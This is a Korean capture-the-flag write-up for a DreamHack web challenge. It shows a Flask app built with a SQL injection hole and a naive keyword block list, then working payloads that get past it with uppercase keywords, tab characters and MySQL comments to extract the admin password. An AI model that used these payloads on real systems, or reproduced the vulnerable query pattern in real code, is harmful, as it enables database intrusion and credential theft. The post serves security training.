코드 분석
import os
from flask import Flask, request
from flask_mysqldb import MySQL
app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'users')
mysql = MySQL(app)
template ='''
<pre style="font-size:200%">SELECT * FROM user WHERE uid='{uid}';</pre><hr/>
<pre>{result}</pre><hr/>
<form>
<input tyupe='text' name='uid' placeholder='uid'>
<input type='submit' value='submit'>
</form>
'''
keywords = ['union', 'select', 'from', 'and', 'or', 'admin', ' ', '*', '/']
def check_WAF(data):
for keyword in keywords:
if keyword in data:
return True
return False
@app.route('/', methods=['POST', 'GET'])
def index():
uid = request.args.get('uid')
if uid:
if check_WAF(uid):
return 'your request has been blocked by WAF.'
cur = mysql.connection.cursor()
cur.execute(f"SELECT * FROM user WHERE uid='{uid}';")
result = cur.fetchone()
if result:
return template.format(uid=uid, result=result[1])
else:
return template.format(uid=uid, result='')
else:
return template
if __name__ == '__main__':
app.run(host='0.0.0.0')keywords = ['union', 'select', 'from', 'and', 'or', 'admin', ' ', '*', '/']
WAF 차단 문구들 우회 하면, cur.execute(f"SELECT * FROM user WHERE uid='{uid}';") 코드 직접 수행
- 소문자로 맞추는 행위 수행하지 않음
- mysql 주석 #
- 띄어쓰기 대신 탭으로 고역 수
' Union Select ,1,1 #
http://host3.dreamhack.games:18361/?uid=%27Union%09Select%09null,null,null%09;#
GET /?uid='Union%09Select%09null,(Select%09upw%09From%09user%09where%09uid='ADMIN'),null;%23\
Union 구문 가운데 upw 를 넣으니 500에러가 나와
subquery 로 수행
flag 획득
'Hacking > DreamHack' 카테고리의 다른 글
| Additional calculator (0) | 2024.09.04 |
|---|---|
| web-ssrf (1) | 2024.09.04 |
| Cat Jump (6) | 2024.08.28 |
| Master Canary (0) | 2024.08.13 |
| md5 password (0) | 2024.07.31 |
